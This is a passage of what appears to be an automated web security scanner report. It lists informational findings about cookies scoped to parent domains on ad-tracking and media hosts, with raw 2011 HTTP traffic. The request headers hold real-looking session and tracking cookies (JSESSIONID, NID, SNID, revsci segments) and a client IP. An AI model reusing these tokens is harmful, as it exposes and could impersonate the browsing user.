Cookie: icu=ChEIs34QChgBIAEoATCP5NfvBAoSCMmhAxAKGAIgAigCML3h1-8EEI_k1-8EGAI.; sess=1; uuid2=3420415245200633085; anj=Kfw)kByDuq(0vd+Be?5ZYTL)6.Z_6mLSHG^$Mglg7#[eC>jObf2zwmy_oS8-DXm*e#>#0f>d3dZ=.Yf*)KU:U06d*R.fph)H_wIT9tRpFa)wUT%mqW=pRsdqVv^RF35%n_Q^:cpr5ep:RI:d*Q]f*6TZ7orR1p>8.+e)7*ulP*$_/_codqSeTnPQP>ZAM@XtL54/JwQXp<6KdREg2=QaT_OW[I42DxyO0vuNdNH@YTHm9X@yt6*5*g%I1Qogv>8Tq%`QThqXzX=qcs%<gmwvgLpBvf_=fChnMmU8k-#bbkuvJg0W]L97!dw7-v:u(ugyd@(tyCzwAAbn#Z-w+U$[l:HEk@p52BEi]D@rNU2*+8*q>gQUqilVQggO[9ko.+?0i9M%Z?fQ69!SL$R`$t1n`NOCsZDnKfGRzP1Tlv(Rm(rKjW:hQtUqx_fbU.aM-m2s4huR<#1^A`tC'$O<aF7UI]Ro.hJ6Sm0@f*ktpgb!A_nBuSF%QuE</hv':wljA`MQbZvif8=xqil`6Rz0pB?RJHsX>UaDhJ[n::w6[afW'UlLx<[-=+iah4q>_UvmARnpCX4V761C=7wjlk%y8'o6yv9Jw2H=bBcvjQL5ie-mjik?DfGaDBk*Ydu!6yDm!cY$lIpJzm32kCFms?p

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 15-Jun-2011 12:02:42 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Mon, 12-Sep-2011 12:02:42 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG68%D>7)*0s]#%2L_'x%SEV/i#+U=4FO?KN1Ipz=Rr7(nTDn(:^i3A^y9mc%vk4^v$yM3WW6G<5`8#q8qLS%.Gg5e[?T1^Q#wfy+>=#D+$s`c#5ht?N!q[ZAHZ1Z1V/eu[*/Lv_57vy>OW./Lt5m[$+zzJenmsrKKAYXY`g:YsVsRgpK'OF`E!2(vac7eTsJ$24IKN+:vi0p2Vw4z^5M5[-UpnshgX'E)?:Y9+`!zXXV<:mwtEQ7$)SP3b`'e-P2$n)w5s#=o9'P(c`e$Y7?glSRJ1YeA-vr%D1[:uhGfeaNS1Lx.ms6'5d'+cbr*E6Tc!h?HlMCRk%]lkUSyLu#SV-)Ax5ikFBZe2^P('_rT)@y#bYwYoQWP[ekHnv4HBG!+W`^U(PHl:.wS<.iz$y+4Gd381>KYR8T$Pjtfc^V%wXDg:0]U!eVN)1?<Z^c?JYo]/qhGM9X+'[fL+NZDCegZnJmSKU0a.$PdC?@$<jBMMo5fRkmrTk]$1htod7UqFe1dz[=3cygdZJ5[m5*(Gc8br6EepfNh/G4MU[p3v$dot(NR$Ib:q[knP3F[/3vuc#>n6L[FU>fwd8x5<=ydvf=+HjP^G2Z; path=/; expires=Mon, 12-Sep-2011 12:02:42 GMT; domain=.adnxs.com; HttpOnly
Location: http://ad.yieldmanager.com/pixel?adv=95413&t=2&id=1203653&id=1203654&id=1203953
Date: Tue, 14 Jun 2011 12:02:42 GMT
Content-Length: 0

11.19. http://id.google.com/verify/EAAAAHyt9BxLLTssjy25y0llsBc.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAHyt9BxLLTssjy25y0llsBc.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAHyt9BxLLTssjy25y0llsBc.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=Chordiant+Software
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=47=CQ41ekAkoyKhsSxp7Lsvf31W-xozO2BEa-Kufadz=x2vqM3hRhyIc_Jyf; PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=47=lorCzpeeruyCsbBVsWEMMq0Dn_FEZO2YvQlh5PbRyvyK-EGYzmwzyA_2p0yLU1EIOsGj5P7ltQDj-N2Ero7RzOq6NjJuFZs5xUAH3SXWEGgb9bkdrXqd248wCK5T3lcc

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=48=oYl1reOuxXNi23oTvJQZ0t3G5szxhjVfMpw07OrS=ptCSwDYFJF_6ZZ3q; expires=Wed, 14-Dec-2011 12:27:46 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Tue, 14 Jun 2011 12:27:46 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;
11.20. http://imx.mtv.com/sitewide/droplets/view_gen.jhtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imx.mtv.com
Path:   /sitewide/droplets/view_gen.jhtml

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sitewide/droplets/view_gen.jhtml?itemUrl=cms_item%3A%2F%2Fwww.mtv.com%2F10325912&tagParams=tag_action%3Dviewed%26 HTTP/1.1
Host: imx.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; s_ppv=62; mbox=session#1308010496673-477284#1308012624|check#true#1308010824; __cs_rr=1; adPlayCounter=1; gs_session=user_id%3D0%26day_stamp%3D15139%26site_id%3D1%26session_id%3D0ba59ab39da532eff77d95c0fb336a2b%26user_name%3D%26validation_key%3Dcbe73a9137cb8591ae079f1a2b3cc064; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Length: 0
Content-Type: text/html
Set-Cookie: app-instance=mtv-com-1-mtv-jboss-030; Path=/
Set-Cookie: MTV_ID=209.18.38.157.1308010817621; Domain=.mtv.com; Expires=Fri, 11-Jun-2021 00:20:17 GMT; Path=/
Set-Cookie: JSESSIONID=D48ED7EDF023D65652E97D5F0EF7CFA9.mtv-jboss-029-811-mtvi-com-34851; Path=/
MTVi-Edge-control: bust-downstream
Vary: Accept-Encoding
Date: Tue, 14 Jun 2011 00:20:17 GMT
Connection: close
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Tue, 04 Dec 1993 21:29:03 GMT

11.21. http://js.revsci.net/gateway/gw.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=G07608 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adad3&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df43073&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzUJZjpr3hc5wFS813GquQMtQrAqXr4DyJtMPyEMN2TS4VlY4qaUGoMGVAYaUgmDvwI5res2yCHqJwUpCl8bXI1x2wD2amdH8k/jmAEMGSOlVkBFtOHkIA6N1ceb/+CvvanugMzfmMxWWXiH+6F/8lLEaTCDxKBO/YXEqzX4Pi64WdCM+73ICL50mkePx5jppZKMzuvHQvSmzKdqHHrrktHJ7LGJATufSzktpJth5OLBEvqEdtzILZmKkac33pw9eJA0okhYvr3qEwAhbz8gJRIOqtT+5cjRdHKlimR/Zf93uEUDyKNOthtBPTpDfREoUp4+5xZWmQJB1g7Bxosyp7HtkUqHuuVgkejaqxCG/g0P7jfgEtR6yLJhEa1Mz7FcRqUGysjKJWzcg5bYZ/ah5Fad96qjRGwPmbnDK5pG67okplQUCPx11iN+fq6uDPiFmZyi0d8JFHm6/2xmN2F6CBXCK6nCSeag6hpLMYOrP3AuUlzqrT7U+Skck+w8glwHhLBLft6YDemqE7Xj0YSR6y4uerWSr2wDFEyV4QJzZ/f+aIOrMR+MkjPltiWeupGgUBrbVnlI24uQ8NgpQcaQKaAFcOoN3NIXqlndo6CvEMQnGhz7gC/JdhZoN7Wj/qpdMetXR/71M7dw3ZB7CuFbBcsMHprOAN3hCv3z/bsOsvah5chlzKYLwxCi8x5S6fQayhX7Wniskh5TCbKxZqXHH+QkNnIBee451U7u3RpQgE9T1SoYQ7zt0XqCh+TO9S2b4Mx54jZr0uA345XOjOU4v7nwrHmxWEA5L0F1MjsUmQnr3tclotWbW2w07LKBIo7yHjwliEDEm1pGvY+a+xfgHap83+GatrgN4ecSGRbCBFgCp+diviMKyrb0nXAwpNhKNkTwtiqdxn6jRuaSmQmu9WZeYV/AULKCZqkDldQFAQhnyVYu13NtRA/BR6BYbX7XsruYKzJ65hL/Vaisc52Il0CA9p8C3UjyqUD+M3O2IfGQZuo2tmWzjMz32TwvlxhESwu6XqR4oJPWtsvLJA1+T3RtNpAFkY6cd++fnc2AzOEeTu5kNwMVtlXikR8rGp9Pg9mwAzQjiMazwVr8v0V9JlbPx+CPllP7ni3ngUtRNGskfAGCc1hOSGLCJxqFvV1MmP4/aoZF6CEdwEEWtAaDLeeBC0kNj/wIEukEprxcgJda2HyyUZ8Hb3n5budHji3Z5USTlT4kELyS0IGH6x/OF7i4jeLIXokyAqHbH2pLeVL7YdRY925o6Xwxo0UorOxWbHFpgiOl1VCgM0O+0weuPSs4jnQ173hP1RYsBdNHJ7HfHDqStStYzQW297VlWqbgULKuXEdCMw2S0AcUlplKJlnmm+8ZiTNZjzyy7PXjlAXzN6v9a7hYqf71T83w1Vf7A//vmNJZ9E2jvUwnvKeU96Tfcz7HTvKmGvis9fi3yNpdVS8Y18CscOUtVKfM+90wLhHo3WeyA4KHZLCXCPmbHEPZI163kCeYdzAGCD4BaQaadnfR6iSrVDGXghSYibeYzhLdX8Y5DCfeLtpNegAnOiNZKbAXJtLJ7EMgKSRXOwK8sVTAXW6bYp+u7INAiKp0chr3RDWlxuB12F0rPA5Y3CezL56SO1BI4S9YU7JCwjBlwIv4QODoc3a1Mbd8YgQKTOkyY8DoLmcIIHLimis0ygM1Bcggp9AvBPj/jKrxx1EMICy1b5gp+NXuJfk9LHBh+rmfQt7otQ==; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JSQLVVzDFCtpU+w6+pH+Y1T9p9LQR/PMkrcUsw+1QGXy+LDb2WDbWjI6teif4fufdjX0iW0zQ3r14JwP/YaUQ4WilEZa1mTBgWbOLLoFHNs08LFTYabwcAaYOpnwILBLA0IVDPkmyj9OMIYKQd6IFV/U7eaOKVpIVUuoozuLsep7zskREZWlB8DC0Z6ZhAC9GNAaNN9SIPSSgIVwuLxxEDWGHmNvQReIPgONCKGbppyUb0MuDFLaVEB21tuA5eB0TwJEppny+pG7rWJSzu9wMWQAYB9UcEa+6Ot/GEdiBGBeZUz/PNWWpTFE5/VfQqv/UGRYazwgPLRpZV2N6R6V5RxGDtwcd0Kg+3xcyiKWsowuExSbhU6VEf7YyiTHaC/du9ddBfScpk1DTJwr8ORBVQshQVh3o+bELFMMFPcKJo85b+qpouTCGevSDP7mo2pY/E0fe1hI4sMnItTGq0az0BD+ZishUixzzbsiOwtQJOi2Ee8JJzVGdoZ61EKoghYOLhDc5eklez24xev7qKS9F7h1mC2RVCY2nxpOwc7SjqXGg/OCww4zaM9AMXFFE49FubdJ0St6r/fWqY7+kfyrhBgu+HSt4ihuLEBSkT05sHLFw5XrC1OeG2PPUrvuBk4AiZTFx38TRLswQ; rtc_AVou=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; rsiPus_NgLQ="MLsXtSUNJghnJ5E4m+qiOkhRwa7hUABMuZFInYmOU5CwyKrbszV5vmL8lWFj4llhxoQ3e1svCK92teQAGGpiXNNk5yhz0k6qMqepXctaemT1zUx64bqPVEDRu9imGo7Ebp2/fQojqVeFKRFF0SA4XwrjqmzDguHf3CyYsCjA09uTjSVJnoABAKJ060se1uo9aNjODvhDz1mbxjhn5k7S8kYNpVefcRkN0ezUbx4yXrKIfKXBpe8haW3Ezn+fg2+3yM7NzmkTlMJi3h2vEpw2B1Hwk/EoJir1a+frRQzq6BVY6++af6bNc9Gsel8szxe1MEEOovznC7OhxhCjQdnq9GL2yO7hYb+lryyzSBqtzIsro8Q+vfYkWgu6ScgTQgC8rvB1avsYeRGbFUvlIBBPOVTIgr31bZqzx0YcEN/qxv7tUWnYbT5qVI+mTiaeGzlurVYN4XcoTRK1iNhTaJGI9W3AcFxFgaLRHmcTh1xT5gRasLrNXoA7Yx36PKLO9qyEORWS8V+HKIP7KaQ0pYzzdT5VgCASQfBKiAp9Fx+vFry0uXdpmrgqwTKnQLh7EZud9NBB/tN7g4znELnLPgvwmOjVzMqdsluxw+PVxnHGpjJUy7CDJHju5PrhQYxgPzNBPg3XFE/IM8qxo9L8puKY63wUo1IJ34Bn2a3nPg99evpS3an0NjrEl9Lc8eMnPE97GKKtUAyp2BuzowKyN27UlRbyJ5kGO3taUNqu6LW7uuqNCi0auOQZpu93nkAwml8uw2P9zb+COGgVslqjvCqSLr4/hmETdV18EdqPJGoaOi0cnIT53ZC8YWsLbo3I5fBfvK+GxL5FQzqNBAvrhd5ETvk1RGVHPXX2KivKpgx2qbmaxEk26/0Bt9MCsofNUzBZcs4u17Jw7uu+hBTQ/vodZwbRVE0IV7cW+IRp8e65d9GvPVtbKW2iTDk7y5SxdiaJwgJGsVy5JNLgCv29A+BcG8QQFfshYztQVOhRMaXaLe3dcTg89YyUsbOH3GLMunfPyJtnAE9twjS4ZETuZV7awzx1MosM9q10mCc7wakiOxmYN/2lABAgiKXTzFfAwRzlIszYo6qtMwxJyltYn5qwTqvsLUVMklnjRTTDaod8z+TJuskM7y5mYJ9g5+jCrycFbRPpz7CBO/LzNfQxdOfAI3jLsj864lYcT9UI8a37SUrkU/0r7LyWYt9OGzcBvfZFprBRDH5kOeRCthtPFYWt0Rq6CT5CJT2H2svpkYiDMElia8cpDenaTXrVDzWjSU7CQjBru+DfQcMKHFRifQkiX+oS605HKn8AoAltf7tLRSZiOPCJMSdTvKumo9b3yOl6m30kP9qk"; rsi_us_1000000="pUMVIymnMBYY1A2AKVvIIuTBYTPKGKPeIlBjyVgbdZ29J76lIs/596g4gx56aSaUsZrP5kX0UekwLOgm90iPjD6R7o+WvDarELVc7RvdZ/T8x+dO+pdp/M4NeSFpZyEYS0O5hZpRcgjiqRjPjPMhDzn7qzSB5uGosGXOa1cwsHj5LNpFUOkdNazF1aDMTcpRZgNkLEY0wjS13tB3wtTOwfoZEQeeSALCIxbuvpHf3bx7mpsCYE02t4xzT5o9NKtvRMEVcfmJjc3/rHMJeDZjB86qQ4ocpYJanK6/Pqe5M++RPnRI6rsGSTSGOB6mSjo0G8NySzn8fumcLKrpCiOQiDYzIw4tbpGFRagp7cQ8VrvHvcVF2ZgBlwZfzy7L0brB9FTXEVeq85mz+ogNOZIpJeiMnvSJLazSGQtFqnBB4XI/dwG2Z2uDnBWI3dlO+qH9FOrWtOOI6v5o0c0TJMT5pGN2v3qnTrcXJvj7hyx+xL2yakmSWpVGywJp8KIUsi2WHeHHBQlgbHBDdmeC7bSsrQzMXvpaG+GBmFQ7QWOerx/xPuGjnEX7NNLSjzTjQLa+Ut7G+6DqE2jShJj/S6XlMCOZSfM9h+VEkH8+l0U0mKM5OK6ZlCAAKli/8grUHMZTQX4Bv6NOwfVnSOoUDG9JQX7uCDFLJNLVnkeCqup6fmOfmkomA2x/O3FB3QzU3xukWlM5u27FFyaYYnHtTkWARy8KeZ2JI3HiIbUfGCqZlp7Umjr0tqF1EXy/4/cjQ7n30Q8RGyC7P8hum2/tg3W3PhZXZpbLCUDphbywIgfBw8y6pMNc8BRAzl+0he/c1XF+0PQbflFiYFcXeGlnLw4Uwwvyhs/awd9sbMrsKRrVmJSzqNZmh0x5x0hVAWhvDCA6BQ8ZqURZOCjqiH855mK3sqrup8s9L575P6sOzyWxELCikSVQoeM6sR58ndOBRS2lG46Udf6M1JW4mZIFb/h5C4ZNCPsIV2mwp0R+xi0lSfmOSsobQut40tp2Td+svCzYt0y0+JotrL/193pAwAiyhfQ6O6CbHt0wF9h/DatbZ942q9SlD0Rmp9LU0ituiKtAnHfE5Onmr4vZpF8JulVfqOLUqaFJG6D9bfluIAfjJWTaPLtmQ3nG0HYMCIHlkOXG8M2Apa4lt5kLhvqhHjOaujZ3caw3GulwzzB95gN0PPH+YO/t7+bpXWE/JxC5NHN/PsidSh/4NMrrF6EfE9PjSOG6CO/Ck16C8OgG3I2l4aNEKz/AfAMb+obO8kko4u4n6XIAJhHFYMuO/zI8b2HyrM6QI0IL3nAmdxTLlf57zuGQSM+8GcRUaj9OMjdon5/TNQ+OW6oLUfodUGlXKTd8fPvkwo/3WbFcYAU6zWvBclL+/+bijDJqLIvaSaGZw/SIdawITb8khSgiQg4gzLk6nH+V1Hi2Q5XfnUDHftS51DCB/xZfAiQT2L24vMLep03CqjBA8NaAfyOmbAIa23LFACO6MJodJa3wiL8YVEo8ou3JMy3dGISGYik2x6fpsR/JNgqwJZSWVhCGB/bgJlpqYwaDB9VJOIImd95OXOiJdmw3VNVl33VouiAKJsBA/9zqU1FROc+iuYSn7hEK52PNFlNbLi8B3ORlodnhdCnixoikKCk9HQwBMAiV8W3BlMXW+lwpxJ4+Dvx1r3qomwkcET6PP16XX1ENsX32kpDWRJkMTNdlK6kqI6Y1a1dLfYCKNHUI+tEzMJ3YgRjYfzoV2sM8kQdnC6LkryLgBgAL4TF/43o="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv3NzUJZjpr3tvXN5oCW8iE3o5lcCzapr7ZyPuzNqEiwsqAs3Z5CT4uCSvFPNQT0hWb+Ql7PLFkrHPAMBJEo8+CkW6yZjLuUwUDDGjJbUeoctczcWYDPi1co/UrWk+TMrIYVFaVlL1f/I1es2gigmjI4FoB644gHJSv8ywcjnyWu9H1qcq4/KgDv7jT4l6HLBoL9mlZmIFDULYF30VFqS9iKgTxNb5I+i0fFWGJT9f7sr0idgWhgiS4mXOfDq3aB46SMfm3ZRQ5fFaWV+95sPMNVUDZWYcqKbr9kVhlQKIKWOGTSV0vOQyWYF7ubKYkaWarYa2dI++2rB+2rl7wGE2LJlxZzF/juUKMEt6FABNvEtf/qhAkjq9eJ5IADHfRkoUTfuIBvds5S3DEr5mYmBk+Apz1PPsClTtHxRDOFlSRcDEv1wH6VNa+ki8I2nSSEqyVuB7LNduVG4PA8V7TxGNyxJVFRu4YwI9UehDB5UDx6RGLe0FmPuNMd8e7K7TQnbhVAQxUnLFQn6Ii1mwBDQeb3Uq1Zu3F2wIxOTz+jpG4jOG+LWWYDyYCsIHC9p1g0b+GmEUm8lUKR9yEvewLaFLR1m21EnT/MbUFivgKAszsmcA5zu/WgTtgEYhKwu20XGcEUhQMJ1Y5Kic5oH920rTK3RGHpLjXbwtgtNZqzTDvB58Q6b59slhpT11735wwv8G0Oo0BprsyhGYi8CsOz3PRCE4B/EzwCh4/ODdgun/LXdPMd6rWgDCoYf1Yf6ySHlcPvLFqpYvF4iT2c0k2m5LKUR87oInvBtChPLnLfHzpYtVOcP2lL+sGlPgezgm6tz+Nqo/ezeRR35eQ8TW6X1qW3UyjhlZU8YsCGj5fpA59zHKSXX22XDarighLu7tHyJX//083MZD7ViaS5T9nioSmnSRSCxiHJ6m3hv+77QHHBrSVnbVasAFdhBzrV9NMkTOe01D+7D++gOCMTT9kawU2P6TU64dVQ4OmUp/Z7K9/32TvfZ7HpQ7/sLr1aNNgh6dyZ9v8HgvncVNuk9zGFtkmnsD9Pkcco+e6EzPGlVnRzFXnJYCkiss4DShHiSg2BogjsbxHeaXEG+W67RFbZV2oxnDuimimm/HM8kilggj+OFaf/qq7tRERvg5pg1FHxhW10mkrhl1nmwscrAHLZBTQqKcky4S0zbzLqJebiuS9dkKTI5DDWLOWhgSFXWe7KigsFgL+mQtJ1o978mcSFvXlHa/a0Tn2Vu5eFfpk5lS0Ih+rFfctHKxSm3u1j8DPmj8S1tqWZ9QvVzReIUJrMk5fOnN8Vqb/H3V3D4ZROw3sbjcYtSgqximbxQfQSj3lIisX2t72VUa1r1Zs1aTMDK1ZcwAXrqio8fTEq5AssvxURgczC5+RAhu9oUwBS6Tb8wl70h4xV5Th9OakL0D1SUsz0xz9CVILvwIDLb0m5Ayf1H7maqNBLHW0pvH3pvLze9Rd+Kb9mq7F5LGa0zzQq0HRkMdgLkO0mCRtv9p5Q2AcIbwFr9thI6XR7IXNML3UeMIY2Axy1Wn1pcsnWQGgwbj8JZ9MhQtL+9OGHZeuFXoGqSPzVgFcCMf+YeFuCkNYhko2nLdHkEButXE3cwD9UPwrpd8KjXWIxmqkN0cNoHKxc2aZWiZ1NiVrqHqpif7KcNBwHl4WFFsrRB1RskjRoztAw0fVZg8TYBwhewZmaJPKU0rM8lceRMYvFDAyNUAbc/RsuG8E7JsBNn7r64w9W7ZI9DosKWm2SGlHQLqDcK9ZKWKcadoRzYI=; Domain=.revsci.net; Expires=Wed, 13-Jun-2012 00:13:54 GMT; Path=/
